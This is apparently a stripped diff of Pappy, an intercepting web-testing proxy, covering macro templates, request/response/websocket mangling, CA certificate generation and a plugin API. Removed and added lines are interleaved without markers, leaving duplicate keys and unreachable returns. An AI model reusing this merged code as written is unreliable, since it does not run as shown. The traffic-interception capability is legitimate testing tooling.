class MacroTemplate(object):
_template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"templates")
_template_data = {
'macro': ('macro.py.template',
'Generic macro template',
'[reqids]',
'macro_{fname}.py',
gen_template_args_macro),
'macro': MacroTemplateData('macro.py.tmpl',
'Generic macro template',
'[reqids]',
'macro_{fname}.py'),
'intmacro': ('intmacro.py.template',
'Generic intercepting macro template',
'',
'int_{fname}.py',
gen_template_generator_noargs('intmacro')),
'modheader': ('macro_header.py.template',
'Modify a header in the request and the response if it exists.',
'',
'int_{fname}.py',
gen_template_generator_noargs('modheader')),
'resubmit': ('macro_resubmit.py.template',
'Resubmit all in-context requests',
'',
'macro_{fname}.py',
gen_template_generator_noargs('resubmit')),
'intmacro': MacroTemplateData('intmacro.py.tmpl',
'Generic intercepting macro template',
'[reqids]',
'int_{fname}.py'),
}
@classmethod
def fill_template(cls, template, subs):
loader = FileSystemLoader(session.config.pappy_dir+'/templates')
loader = FileSystemLoader(cls._template_dir)
env = Environment(loader=loader)
template = env.get_template(cls._template_data[template][0])
template = env.get_template(cls._template_data[template].filename)
return template.render(zip=zip, **subs)
@classmethod
@defer.inlineCallbacks
def fill_template_args(cls, template, args=[]):
ret = cls._template_data[template][4](args)
if isinstance(ret, defer.Deferred):
ret = yield ret
defer.returnValue(ret)
@classmethod
def template_filename(cls, template, fname):
return cls._template_data[template][3].format(fname=fname)
return cls._template_data[template].fname_fmt.format(fname=fname)
@classmethod
def template_list(cls):
return [k for k, v in cls._template_data.iteritems()]
def template_names(cls):
for k, v in cls._template_data.iteritems():
yield k
@classmethod
def template_description(cls, template):
return cls._template_data[template][1]
return cls._template_data[template].description
@classmethod
def template_argstring(cls, template):
return cls._template_data[template][2]
return cls._template_data[template].argdesc
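A usage sketch for the template machinery above, generating an intercepting macro skeleton on disk; the subs keys mirror what gen_template_generator_noargs supplies:

    subs = {'macro_name': 'My Macro', 'short_name': ''}
    code = MacroTemplate.fill_template('intmacro', subs)
    fname = MacroTemplate.template_filename('intmacro', 'mymacro')  # -> int_mymacro.py
    with open(fname, 'w') as f:
        f.write(code)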
## Other functions
@defer.inlineCallbacks
def async_mangle_ws(self, request, message):
if hasattr(self.source, 'async_mangle_ws'):
mangled_ws = yield self.source.async_mangle_ws(request, message)
defer.returnValue(mangled_ws)
defer.returnValue(message)
class MacroTemplate(object):
_template_data = {
'macro': ('macro.py.template',
'Generic macro template',
'[reqids]',
'macro_{fname}.py',
gen_template_args_macro),
'intmacro': ('intmacro.py.template',
'Generic intercepting macro template',
'',
'int_{fname}.py',
gen_template_generator_noargs('intmacro')),
'modheader': ('macro_header.py.template',
'Modify a header in the request and the response if it exists.',
'',
'int_{fname}.py',
gen_template_generator_noargs('modheader')),
'resubmit': ('macro_resubmit.py.template',
'Resubmit all in-context requests',
'',
'macro_{fname}.py',
gen_template_generator_noargs('resubmit')),
}
@classmethod
def fill_template(cls, template, subs):
loader = FileSystemLoader(session.config.pappy_dir+'/templates')
env = Environment(loader=loader)
template = env.get_template(cls._template_data[template][0])
return template.render(zip=zip, **subs)
@classmethod
@defer.inlineCallbacks
def fill_template_args(cls, template, args=[]):
ret = cls._template_data[template][4](args)
if isinstance(ret, defer.Deferred):
ret = yield ret
defer.returnValue(ret)
@classmethod
def template_filename(cls, template, fname):
return cls._template_data[template][3].format(fname=fname)
@classmethod
def template_list(cls):
return [k for k, v in cls._template_data.iteritems()]
@classmethod
def template_description(cls, template):
return cls._template_data[template][1]
@classmethod
def template_argstring(cls, template):
return cls._template_data[template][2]
## Other functions
def load_macros(loc):
def load_macros(loc, client):
"""
Loads the macros stored in the location and returns a list of Macro objects
"""
macro_files = glob.glob(loc + "/macro_*.py")
macro_objs = []
for f in macro_files:
try:
macro_objs.append(Macro(f))
except PappyException as e:
print str(e)
macro_objs.append(MacroFile(f))
int_macro_files = glob.glob(loc + "/int_*.py")
int_macro_objs = []
for f in int_macro_files:
try:
int_macro_objs.append(FileInterceptMacro(f))
except PappyException as e:
print str(e)
int_macro_objs.append(FileInterceptMacro(client, filename=f))
return (macro_objs, int_macro_objs)
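Usage sketch: loading every macro_*.py and int_*.py from the current directory and listing what was found:

    macros, int_macros = load_macros('.', client)
    for m in macros:
        print(m.name)   # name parsed from macro_<name>.py
    for im in int_macros:
        print(im.name)  # name parsed from int_<name>.py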
def req_obj_def(req):
lines = req.full_request.splitlines(True)
esclines = [line.encode('string_escape') for line in lines]
params = []
if req.is_ssl:
params.append('is_ssl=True')
if req.port != 443:
params.append('port=%d'%req.port)
else:
if req.port != 80:
params.append('port=%d'%req.port)
if 'host' in req.headers and req.host != req.headers['host']:
params.append('host=%s'%req.host)
if params:
req_params = ', '+', '.join(params)
else:
req_params = ''
ret = 'Request (('
for line in esclines:
ret += "'%s'\n" % line
ret += ')'
ret += req_params
ret += ')'
return ret
def macro_from_requests(reqs, short_name='', long_name=''):
def macro_from_requests(reqs, template='macro'):
# Generates a macro that defines request objects for each of the requests
# in reqs
subs = {}
if long_name:
subs['macro_name'] = long_name
else:
random.seed()
subs['macro_name'] = 'Macro %d' % random.randint(1,99999999)
subs['short_name'] = short_name
req_lines = []
req_params = []
for req in reqs:
lines = req.full_request.splitlines(True)
esclines = [line.encode('string_escape') for line in lines]
lines = req.full_message().splitlines(True)
#esclines = [line.encode('unicode_escape') for line in lines]
esclines = [line for line in lines]
req_lines.append(esclines)
params = []
if req.is_ssl:
params.append('is_ssl=True')
if req.port != 443:
params.append('port=%d'%req.port)
else:
if req.port != 80:
params.append('port=%d'%req.port)
if params:
req_params.append(', '+', '.join(params))
else:
req_params.append('')
params.append('dest_host="{}"'.format(req.dest_host))
params.append('dest_port={}'.format(req.dest_port))
params.append('use_tls={}'.format(req.use_tls))
req_params.append(', '.join(params))
subs['req_lines'] = req_lines
subs['req_params'] = req_params
return MacroTemplate.fill_template('macro', subs)
return MacroTemplate.fill_template(template, subs)
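Usage sketch: turning a list of request objects into a runnable macro file; reqs here are objects exposing full_message(), dest_host, dest_port and use_tls, as used above:

    code = macro_from_requests(reqs)  # render the 'macro' template with the request data
    fname = MacroTemplate.template_filename('macro', 'replay')  # -> macro_replay.py
    with open(fname, 'w') as f:
        f.write(code)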
@defer.inlineCallbacks
def mangle_request(request, intmacros):
"""
Mangle a request with a list of intercepting macros.
Returns a tuple that contains the resulting request (with its unmangled
value set if needed) and a bool that states whether the request was modified
Returns (None, True) if the request was dropped.
# @defer.inlineCallbacks
# def mangle_request(request, intmacros):
# """
# Mangle a request with a list of intercepting macros.
# Returns a tuple that contains the resulting request (with its unmangled
# value set if needed) and a bool that states whether the request was modified
# Returns (None, True) if the request was dropped.
:rtype: (Request, Bool)
"""
# Mangle requests with list of intercepting macros
if not intmacros:
defer.returnValue((request, False))
# :rtype: (Request, Bool)
# """
# # Mangle requests with list of intercepting macros
# if not intmacros:
# defer.returnValue((request, False))
cur_req = request.copy()
for macro in intmacros:
if macro.intercept_requests:
if macro.async_req:
cur_req = yield macro.async_mangle_request(cur_req.copy())
else:
cur_req = macro.mangle_request(cur_req.copy())
# cur_req = request.copy()
# for macro in intmacros:
# if macro.intercept_requests:
# if macro.async_req:
# cur_req = yield macro.async_mangle_request(cur_req.copy())
# else:
# cur_req = macro.mangle_request(cur_req.copy())
if cur_req is None:
defer.returnValue((None, True))
# if cur_req is None:
# defer.returnValue((None, True))
mangled = False
if not cur_req == request or \
not cur_req.host == request.host or \
not cur_req.port == request.port or \
not cur_req.is_ssl == request.is_ssl:
# copy unique data to new request and clear it off old one
cur_req.unmangled = request
cur_req.unmangled.is_unmangled_version = True
if request.response:
cur_req.response = request.response
request.response = None
mangled = True
else:
# return the original request
cur_req = request
defer.returnValue((cur_req, mangled))
# mangled = False
# if not cur_req == request or \
# not cur_req.host == request.host or \
# not cur_req.port == request.port or \
# not cur_req.is_ssl == request.is_ssl:
# # copy unique data to new request and clear it off old one
# cur_req.unmangled = request
# cur_req.unmangled.is_unmangled_version = True
# if request.response:
# cur_req.response = request.response
# request.response = None
# mangled = True
# else:
# # return the original request
# cur_req = request
# defer.returnValue((cur_req, mangled))
@defer.inlineCallbacks
def mangle_response(request, intmacros):
"""
Mangle a request's response with a list of intercepting macros.
Returns a bool stating whether the request's response was modified.
Unmangled values will be updated as needed.
# @defer.inlineCallbacks
# def mangle_response(request, intmacros):
# """
# Mangle a request's response with a list of intercepting macros.
# Returns a bool stating whether the request's response was modified.
# Unmangled values will be updated as needed.
:rtype: Bool
"""
if not intmacros:
defer.returnValue(False)
# :rtype: Bool
# """
# if not intmacros:
# defer.returnValue(False)
old_rsp = request.response
for macro in intmacros:
if macro.intercept_responses:
# We copy so that changes to request.response doesn't mangle the original response
request.response = request.response.copy()
if macro.async_rsp:
request.response = yield macro.async_mangle_response(request)
else:
request.response = macro.mangle_response(request)
# old_rsp = request.response
# for macro in intmacros:
# if macro.intercept_responses:
# # We copy so that changes to request.response doesn't mangle the original response
# request.response = request.response.copy()
# if macro.async_rsp:
# request.response = yield macro.async_mangle_response(request)
# else:
# request.response = macro.mangle_response(request)
if request.response is None:
defer.returnValue(True)
# if request.response is None:
# defer.returnValue(True)
mangled = False
if not old_rsp == request.response:
request.response.rspid = old_rsp
old_rsp.rspid = None
request.response.unmangled = old_rsp
request.response.unmangled.is_unmangled_version = True
mangled = True
else:
request.response = old_rsp
defer.returnValue(mangled)
# mangled = False
# if not old_rsp == request.response:
# request.response.rspid = old_rsp
# old_rsp.rspid = None
# request.response.unmangled = old_rsp
# request.response.unmangled.is_unmangled_version = True
# mangled = True
# else:
# request.response = old_rsp
# defer.returnValue(mangled)
@defer.inlineCallbacks
def mangle_websocket_message(message, request, intmacros):
# Mangle messages with list of intercepting macros
if not intmacros:
defer.returnValue((message, False))
# @defer.inlineCallbacks
# def mangle_websocket_message(message, request, intmacros):
# # Mangle messages with list of intercepting macros
# if not intmacros:
# defer.returnValue((message, False))
cur_msg = message.copy()
for macro in intmacros:
if macro.intercept_ws:
if macro.async_ws:
cur_msg = yield macro.async_mangle_ws(request, cur_msg.copy())
else:
cur_msg = macro.mangle_ws(request, cur_msg.copy())
# cur_msg = message.copy()
# for macro in intmacros:
# if macro.intercept_ws:
# if macro.async_ws:
# cur_msg = yield macro.async_mangle_ws(request, cur_msg.copy())
# else:
# cur_msg = macro.mangle_ws(request, cur_msg.copy())
if cur_msg is None:
defer.returnValue((None, True))
# if cur_msg is None:
# defer.returnValue((None, True))
mangled = False
if not cur_msg == message:
# copy unique data to new request and clear it off old one
cur_msg.unmangled = message
cur_msg.unmangled.is_unmangled_version = True
mangled = True
else:
# return the original request
cur_msg = message
defer.returnValue((cur_msg, mangled))
# mangled = False
# if not cur_msg == message:
# # copy unique data to new request and clear it off old one
# cur_msg.unmangled = message
# cur_msg.unmangled.is_unmangled_version = True
# mangled = True
# else:
# # return the original request
# cur_msg = message
# defer.returnValue((cur_msg, mangled))

View file

@ -1,78 +0,0 @@
import copy
import os
import string
import subprocess
import tempfile
import pappyproxy
from pappyproxy import http
from twisted.internet import defer
MACRO_NAME = 'Pappy Text Editor Interceptor'
@defer.inlineCallbacks
def async_mangle_request(request):
# This function gets called to mangle/edit requests passed through the proxy
retreq = request
# Write original request to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.full_request)
# Have the console edit the file
yield pappyproxy.console.edit_file(tfName)
# Create new mangled request from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Request dropped!')
defer.returnValue(None)
mangled_req = http.Request(text, update_content_length=True)
mangled_req.port = request.port
mangled_req.is_ssl = request.is_ssl
# Check if it changed
if mangled_req.full_request != request.full_request:
retreq = mangled_req
defer.returnValue(retreq)
@defer.inlineCallbacks
def async_mangle_response(request):
# This function gets called to mangle/edit responses passed through the proxy
retrsp = request.response
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.response.full_response)
# Have the console edit the file
yield pappyproxy.console.edit_file(tfName, front=True)
# Create new mangled response from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Response dropped!')
defer.returnValue(None)
mangled_rsp = http.Response(text, update_content_length=True)
if mangled_rsp.full_response != request.response.full_response:
mangled_rsp.unmangled = request.response
retrsp = mangled_rsp
defer.returnValue(retrsp)

142
pappyproxy/pap.py Normal file
View file

@ -0,0 +1,142 @@
#!/usr/bin/env python3
import argparse
import sys
import time
import os
from .proxy import HTTPRequest, ProxyClient, MessageError
from .console import interface_loop
from .config import ProxyConfig
from .util import confirm
def fmt_time(t):
timestr = time.strftime("%Y-%m-%d %H:%M:%S", t) # time.strftime has no sub-second (%f) support
return timestr
def print_msg(msg, title):
print("-"*10 + " " + title + " " + "-"*10)
print(msg.full_message().decode())
def print_rsp(rsp):
print_msg(rsp, "RESPONSE")
if rsp.unmangled:
print_msg(rsp, "UNMANGLED RESPONSE")
def print_ws(ws):
print("ToServer=%s, IsBinary=%s")
print(ws.message)
def print_req(req):
print_msg(req, "REQUEST")
if req.unmangled:
print_msg(req, "UNMANGLED REQUEST")
if req.response:
print_rsp(req.response)
def generate_certificates(client, path):
try:
os.makedirs(path, 0o755)
except os.error as e:
if not os.path.isdir(path):
raise e
pkey_file = os.path.join(path, 'server.key')
cert_file = os.path.join(path, 'server.pem')
client.generate_certificates(pkey_file, cert_file)
def load_certificates(client, path):
client.load_certificates(os.path.join(path, "server.pem"),
os.path.join(path, "server.key"))
def main():
parser = argparse.ArgumentParser(description="Pappy client")
parser.add_argument("--binary", nargs=1, help="location of the backend binary")
parser.add_argument("--attach", nargs=1, help="attach to an already running backend")
parser.add_argument("--dbgattach", nargs=1, help="attach to an already running backend and also perform setup")
parser.add_argument('--debug', help='run in debug mode', action='store_true')
parser.add_argument('--lite', help='run in lite mode', action='store_true')
args = parser.parse_args()
if args.binary is not None and args.attach is not None:
print("Cannot provide both a binary location and an address to connect to")
exit(1)
data_dir = os.path.join(os.path.expanduser('~'), '.pappy')
if args.binary is not None:
binloc = args.binary[0]
msg_addr = None
elif args.attach is not None or args.dbgattach:
binloc = None
if args.attach is not None:
msg_addr = args.attach[0]
if args.dbgattach is not None:
msg_addr = args.dbgattach[0]
else:
msg_addr = None
try:
# Try to get the binary from GOPATH
gopath = os.environ["GOPATH"]
binloc = os.path.join(gopath, "bin", "puppy")
except:
# Try to get the binary from ~/.pappy/puppy
binloc = os.path.join(data_dir, "puppy")
if not os.path.exists(binloc):
print("Could not find puppy binary in GOPATH or ~/.pappy. Please ensure that it has been compiled, or pass in the binary location from the command line")
exit(1)
config = ProxyConfig()
if not args.lite:
config.load("./config.json")
cert_dir = os.path.join(data_dir, "certs")
with ProxyClient(binary=binloc, conn_addr=msg_addr, debug=args.debug) as client:
try:
load_certificates(client, cert_dir)
except MessageError as e:
print(str(e))
if(confirm("Would you like to generate the certificates now?", "y")):
generate_certificates(client, cert_dir)
print("Certificates generated to {}".format(cert_dir))
print("Be sure to add {} to your trusted CAs in your browser!".format(os.path.join(cert_dir, "server.pem")))
load_certificates(client, cert_dir)
else:
print("Can not run proxy without SSL certificates")
exit(1)
try:
# Only try and listen/set default storage if we're not attaching
if args.attach is None:
if args.lite:
storage = client.add_in_memory_storage("")
else:
storage = client.add_sqlite_storage("./data.db", "")
client.disk_storage = storage
client.inmem_storage = client.add_in_memory_storage("m")
client.set_proxy_storage(storage.storage_id)
for iface, port, transparent in config.listeners:
try:
if transparent is not None:
destHost, destPort, destUseTLS = transparent
client.add_listener(iface, port, transparent=True,
destHost=destHost, destPort=destPort, destUseTLS=destUseTLS)
else:
client.add_listener(iface, port)
except MessageError as e:
print(str(e))
# Set upstream proxy
if config.use_proxy:
client.set_proxy(config.use_proxy,
config.proxy_host,
config.proxy_port,
config.is_socks_proxy)
interface_loop(client)
except MessageError as e:
print(str(e))
if __name__ == "__main__":
main()
def start():
main()
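A sketch of the listener tuples main() expects ProxyConfig to yield, matching how the loop above unpacks them; the values are illustrative, and the JSON schema behind config.load() lives in ProxyConfig, which is not part of this diff:

    # each entry unpacks as (iface, port, transparent); transparent is None for a
    # regular listener, or (destHost, destPort, destUseTLS) for transparent mode
    listeners = [
        ("127.0.0.1", 8080, None),
        ("127.0.0.1", 8081, ("example.com", 443, True)),
    ]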

View file

@ -1,296 +0,0 @@
#!/usr/bin/env python2
"""
Handles the main Pappy session.
.. data:: session
The :class:`pappyproxy.pappy.PappySession` object for the current session. Mainly
used for accessing the session's config information.
"""
import crochet
import txaio
crochet.no_setup()
txaio.use_twisted()
import argparse
import datetime
import os
import schema.update
import shutil
import sys
import tempfile
import signal
from . import comm
from . import config
from . import compress
from . import context
from . import crypto
from . import http
from .console import ProxyCmd
from .util import PappyException
from twisted.enterprise import adbapi
from twisted.internet import reactor, defer
from twisted.internet.error import CannotListenError
from twisted.internet.protocol import ServerFactory
from twisted.internet.threads import deferToThread
main_context = context.Context()
all_contexts = [main_context]
session = None
quit_confirm_time = None
try:
from guppy import hpy
heapstats = hpy()
heapstats.setref()
except ImportError:
heapstats = None
class PappySession(object):
"""
An object representing a pappy session. Mainly you'll only use this to get to
the session config.
:ivar config: The configuration settings for the session
:vartype config: :class:`pappyproxy.config.PappyConfig`
"""
def __init__(self, sessconfig):
self.config = sessconfig
self.complete_defer = defer.Deferred()
self.server_factories = []
self.plugin_loader = None
self.cons = None
self.dbpool = None
self.delete_data_on_quit = False
self.ports = None
self.crypto = crypto.Crypto(sessconfig)
@defer.inlineCallbacks
def start(self):
from . import proxy, plugin
if self.config.crypt_session:
if self.decrypt():
self.config.load_from_file('./config.json')
self.config.global_load_from_file()
self.delete_data_on_quit = False
else:
self.complete_defer.callback(None)
return
# If the data file doesn't exist, create it with restricted permissions
if not os.path.isfile(self.config.datafile):
with os.fdopen(os.open(self.config.datafile, os.O_CREAT, 0o0600), 'r'):
pass
self.dbpool = adbapi.ConnectionPool("sqlite3", self.config.datafile,
check_same_thread=False,
cp_openfun=set_text_factory,
cp_max=1)
try:
yield schema.update.update_schema(self.dbpool, self.config.datafile)
except Exception as e:
print 'Error updating schema: %s' % e
print 'Exiting...'
self.complete_defer.callback(None)
return
http.init(self.dbpool)
yield http.Request.cache.load_ids()
context.reset_context_caches()
# Run the proxy
if self.config.debug_dir and os.path.exists(self.config.debug_dir):
shutil.rmtree(self.config.debug_dir)
print 'Removing old debugging output'
listen_strs = []
self.ports = []
for listener in self.config.listeners:
#server_factory = proxy.ProxyServerFactory(save_all=True)
server_factory = proxy.ProxyProtocolFactory()
try:
if 'forward_host_ssl' in listener and listener['forward_host_ssl']:
server_factory.force_ssl = True
server_factory.forward_host = listener['forward_host_ssl']
elif 'forward_host' in listener and listener['forward_host']:
server_factory.force_ssl = False
server_factory.forward_host = listener['forward_host']
port = reactor.listenTCP(listener['port'], server_factory, interface=listener['interface'])
listener_str = 'port %d' % listener['port']
if listener['interface'] not in ('127.0.0.1', 'localhost'):
listener_str += ' (bound to %s)' % listener['interface']
listen_strs.append(listener_str)
self.ports.append(port)
self.server_factories.append(server_factory)
except CannotListenError as e:
print repr(e)
if listen_strs:
print 'Proxy is listening on %s' % (', '.join(listen_strs))
else:
print 'No listeners opened'
com_factory = ServerFactory()
com_factory.protocol = comm.CommServer
# Make the port different for every instance of pappy, then pass it to
# anything we run. Otherwise we can only have it running once on a machine
self.comm_port = reactor.listenTCP(0, com_factory, interface='127.0.0.1')
self.comm_port = self.comm_port.getHost().port
# Load the scope
yield context.load_scope(self.dbpool)
context.reset_to_scope(main_context)
sys.argv = [sys.argv[0]] # cmd2 tries to parse args
self.cons = ProxyCmd(session=session)
self.plugin_loader = plugin.PluginLoader(self.cons)
for d in self.config.plugin_dirs:
if not os.path.exists(d):
os.makedirs(d)
self.plugin_loader.load_directory(d)
# Add cleanup to defer
self.complete_defer = deferToThread(self.cons.cmdloop)
self.complete_defer.addCallback(self.cleanup)
def encrypt(self):
if self.crypto.encrypt_project():
return True
else:
return False
def decrypt(self):
# Attempt to decrypt project archive
if self.crypto.decrypt_project():
return True
# Quit pappy on failure
else:
return False
@defer.inlineCallbacks
def cleanup(self, ignored=None):
for port in self.ports:
yield port.stopListening()
if self.delete_data_on_quit:
print 'Deleting temporary datafile'
os.remove(self.config.datafile)
# Encrypt the project when in crypto mode
if self.config.crypt_session:
self.encrypt()
def parse_args():
# parses sys.argv and returns a settings dictionary
parser = argparse.ArgumentParser(description='An intercepting proxy for testing web applications.')
parser.add_argument('-l', '--lite', help='Run the proxy in "lite" mode', action='store_true')
parser.add_argument('-d', '--debug', help='Run the proxy in "debug" mode', action='store_true')
try:
hlpmsg = ''.join(['Start pappy in "crypto" mode,',
'must supply a name for the encrypted',
'project archive [CRYPT]'])
parser.add_argument('-c', '--crypt', type=str, nargs=1, help=hlpmsg)
except:
print 'Must supply a project name: pappy -c <project_name>'
reactor.stop()
defer.returnValue(None)
args = parser.parse_args(sys.argv[1:])
settings = {}
if args.lite:
settings['lite'] = True
else:
settings['lite'] = False
if args.crypt:
# Convert from single-item list produced by argparse `nargs=1`
settings['crypt'] = args.crypt[0].encode('utf-8')
else:
settings['crypt'] = None
if args.debug:
settings['debug'] = True
else:
settings['debug'] = False
return settings
def set_text_factory(conn):
conn.text_factory = str
def custom_int_handler(signum, frame):
# sorry
print "Sorry, we can't kill things partway through otherwise the data file might be left in a corrupt state"
@defer.inlineCallbacks
def main():
global session
try:
settings = parse_args()
except SystemExit:
print 'Did you mean to just start the console? If so, just run `pappy` without any arguments then enter commands into the prompt that appears.'
reactor.stop()
defer.returnValue(None)
pappy_config = config.PappyConfig()
if not os.path.exists(pappy_config.data_dir):
os.makedirs(pappy_config.data_dir)
session = PappySession(pappy_config)
signal.signal(signal.SIGINT, interrupt_handler)
if settings['crypt']:
pappy_config.crypt_file = settings['crypt']
pappy_config.crypt_session = True
elif settings['lite']:
conf_settings = pappy_config.get_default_config()
conf_settings['debug_dir'] = None
conf_settings['debug_to_file'] = False
conf_settings['history_size'] = 0
with tempfile.NamedTemporaryFile(delete=False) as tf:
conf_settings['data_file'] = tf.name
print 'Temporary datafile is %s' % tf.name
session.delete_data_on_quit = True
pappy_config.load_settings(conf_settings)
else:
# Initialize config
pappy_config.load_from_file('./config.json')
pappy_config.global_load_from_file()
session.delete_data_on_quit = False
if settings['debug']:
pappy_config.debug = True
yield session.start()
session.complete_defer.addCallback(lambda ignored: reactor.stop())
def start():
reactor.callWhenRunning(main)
reactor.run()
def interrupt_handler(signal, frame):
global session
global quit_confirm_time
if not quit_confirm_time or datetime.datetime.now() > quit_confirm_time:
print ''
print ('Interrupting will cause Pappy to quit completely. This will '
'cause any in-memory only requests to be lost, but all other '
'data will be saved.')
print ('Interrupt a second time to confirm.')
print ''
quit_confirm_time = datetime.datetime.now() + datetime.timedelta(0, 10)
else:
d = session.cleanup()
d.addBoth(lambda _: reactor.stop())
d.addBoth(lambda _: os._exit(1)) # Sorry blocking threads :(
if __name__ == '__main__':
start()

View file

@ -1,257 +0,0 @@
"""
This module contains all the api calls written for use in plugins. If you want
to do anything that isn't allowed through these function calls or through the
functions provided for macros, contact me and I'll see what I can do to add some
more functionality into the next version.
"""
import glob
import imp
import os
import pappyproxy
import stat
import crochet
from twisted.internet import defer
from .colors import Colors
from .util import PappyException
class Plugin(object):
def __init__(self, cmd, fname=None):
self.cmd = cmd
self.filename = ''
self.source = None
self.module_name = ''
if fname:
self.filename = fname
self.load_file(fname)
def load_file(self, fname):
module_name = os.path.basename(os.path.splitext(fname)[0])
if os.path.basename(fname) == '__init__.py':
return
st = os.stat(fname)
if (st.st_mode & stat.S_IWOTH):
raise PappyException("Refusing to load world-writable plugin: %s" % fname)
self.source = imp.load_source('%s'%module_name, fname)
if hasattr(self.source, 'load_cmds'):
self.source.load_cmds(self.cmd)
else:
print ('WARNING: %s does not define load_cmds. It will not be '
'possible to interact with the plugin through the console.' % fname)
self.module_name = module_name
class PluginLoader(object):
def __init__(self, cmd):
self.cmd = cmd
self.loaded_plugins = []
self.plugins_by_name = {}
def load_plugin(self, fname):
p = Plugin(self.cmd, fname)
self.loaded_plugins.append(p)
self.plugins_by_name[p.module_name] = p
def load_directory(self, directory):
fnames = glob.glob(os.path.join(directory, '*.py'))
for fname in fnames:
try:
self.load_plugin(fname)
except PappyException as e:
print str(e)
##########################
## Plugin helper functions
def plugin_by_name(name):
"""
Returns an interface to access the methods of a plugin from its
name. For example, to call the ``foo`` function from the ``bar``
plugin you would call ``plugin_by_name('bar').foo()``.
"""
import pappyproxy.pappy
if name in pappyproxy.pappy.plugin_loader.plugins_by_name:
return pappyproxy.pappy.plugin_loader.plugins_by_name[name].source
else:
raise PappyException('No plugin with name %s is loaded' % name)
def add_intercepting_macro(name, macro):
"""
Adds an intercepting macro to the proxy. You can either use a
:class:`pappyproxy.macros.FileInterceptMacro` to load an
intercepting macro from the disk, or you can create your own using
an :class:`pappyproxy.macros.InterceptMacro` as a base class. You
must give a unique name that will be used in
:func:`pappyproxy.plugin.remove_intercepting_macro` to deactivate
it. Remember that activating an intercepting macro will disable
request streaming and will affect performance, so only use this if
you actually need to modify messages before they are passed along.
"""
for factory in pappyproxy.pappy.session.server_factories:
factory.add_intercepting_macro(macro, name=name)
def remove_intercepting_macro(name):
"""
Stops an active intercepting macro. You must pass in the name that
you used when calling
:func:`pappyproxy.plugin.add_intercepting_macro` to identify which
macro you would like to stop.
"""
for factory in pappyproxy.pappy.session.server_factories:
factory.remove_intercepting_macro(name=name)
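A plugin-side usage sketch tying the two calls together; the dict-like headers access on the response object is an assumption about the Response API, not shown here:

    from pappyproxy.macros import InterceptMacro
    from pappyproxy.plugin import add_intercepting_macro, remove_intercepting_macro

    class MarkResponses(InterceptMacro):
        def __init__(self):
            InterceptMacro.__init__(self)
            self.name = 'Mark Responses'
            self.intercept_responses = True

        def mangle_response(self, request):
            rsp = request.response
            rsp.headers['X-Marked'] = 'true'  # assumed dict-like headers
            return rsp

    add_intercepting_macro('mark', MarkResponses())
    # ... later, to deactivate it:
    remove_intercepting_macro('mark')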
def active_intercepting_macros():
"""
Returns a dict of the active intercepting macro objects. Modifying
this list will not affect which macros are active.
"""
# every factory should have the same int macros so screw it we'll
# just use the macros from the first one
ret = []
if len(pappyproxy.pappy.session.server_factories) > 0:
ret = pappyproxy.pappy.session.server_factories[0].get_macro_list()
return ret
def in_memory_reqs():
"""
Returns a list containing the ids of the requests which exist in
memory only (requests with an m## style id). You can call either
:func:`pappyproxy.http.Request.save` or
:func:`pappyproxy.http.Request.async_deep_save` to save the
request to the data file.
"""
return list(pappyproxy.http.Request.cache.inmem_reqs)
def req_history(num=-1, ids=None, include_unmangled=False):
"""
Returns a generator that yields deferreds which resolve to
requests in history, ignoring the current context. If ``num`` is
given, it will stop after ``num`` requests have been generated. If
``ids`` is given, it will only include those IDs. If
``include_unmangled`` is True, then the iterator will include
requests which are the unmangled version of other requests.
An example of using the iterator to print the 10 most recent requests::
@defer.inlineCallbacks
def find_food():
for req_d in req_history(10):
req = yield req_d
print '-'*10
print req.full_message_pretty
"""
return pappyproxy.http.Request.cache.req_it(num=num, ids=ids, include_unmangled=include_unmangled)
def async_main_context_ids(n=-1):
"""
Returns a deferred that resolves into a list of up to ``n`` of the
most recent requests in the main context. You can then use
:func:`pappyproxy.http.Request.load_request` to load the requests
in the current context. If no value is passed for ``n``, this will
return all of the IDs in the context.
"""
return pappyproxy.pappy.main_context.get_reqs(n)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def main_context_ids(*args, **kwargs):
"""
Same as :func:`pappyproxy.plugin.async_main_context_ids` but can be called
from macros and other non-async only functions. Cannot be called in async
functions.
"""
ret = yield async_main_context_ids(*args, **kwargs)
defer.returnValue(ret)
def add_to_history(req):
"""
Save a request to history without saving it to the data file. The request
will only be saved in memory, so when the program is exited or `clrmem`
is run, the request will be deleted.
:param req: The request to add to history
:type req: :class:`pappyproxy.http.Request`
"""
pappyproxy.http.Request.cache.add(req)
pappyproxy.context.reset_context_caches()
def get_active_filter_strings():
"""
Returns a list of filter strings representing the currently active filters
"""
filts = pappyproxy.pappy.main_context.active_filters
strs = []
for f in filts:
strs.append(f.filter_string)
return strs
def run_cmd(cmd):
"""
Run a command as if you typed it into the console. Try and use
existing APIs to do what you want before using this.
"""
pappyproxy.pappy.cons.onecmd(cmd)
def require_modules(*largs):
"""
A wrapper to make sure that plugin dependencies are installed. For example,
if a command requires the ``psutil`` and ``objgraph`` package, you should
format your command like::
@require_modules('psutil', 'objgraph')
def my_command(line):
import objgraph
import psutil
# ... rest of command ...
If you try to run the command without being able to import all of the required
modules, the command will print an error and not run the command.
"""
def wr(func):
def wr2(*args, **kwargs):
missing = []
for l in largs:
try:
imp.find_module(l)
except ImportError:
missing.append(l)
if missing:
print 'Command requires %s module(s)' % (', '.join([Colors.RED+m+Colors.ENDC for m in missing]))
else:
return func(*args, **kwargs)
return wr2
return wr
def set_context_to_saved(name):
"""
Sets the current context to the context saved under the given name.
Raises PappyException if name does not exist
"""
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def delete_saved_context(name):
"""
Deletes the saved context with the given name.
Raises PappyException if name does not exist
"""
def save_current_context(name):
"""
Saves the current context under the given name.
"""
def save_context(name, filter_strs):
"""
Takes a list of filter strings and saves it as a context under the given name.
:param name: The name to save the context under
:type name: string
:param filter_strs: The in-order list of filter strings of the context to save.
:type filter_strs: List of strings
"""

View file

@ -1,151 +0,0 @@
import gc
import shlex
import code
import crochet
import os
import resource
import random
import datetime
from pappyproxy.http import Request, post_request
from pappyproxy.util import PappyException
from pappyproxy.requestcache import RequestCache
from pappyproxy.util import print_requests
from pappyproxy.pappy import heapstats, session
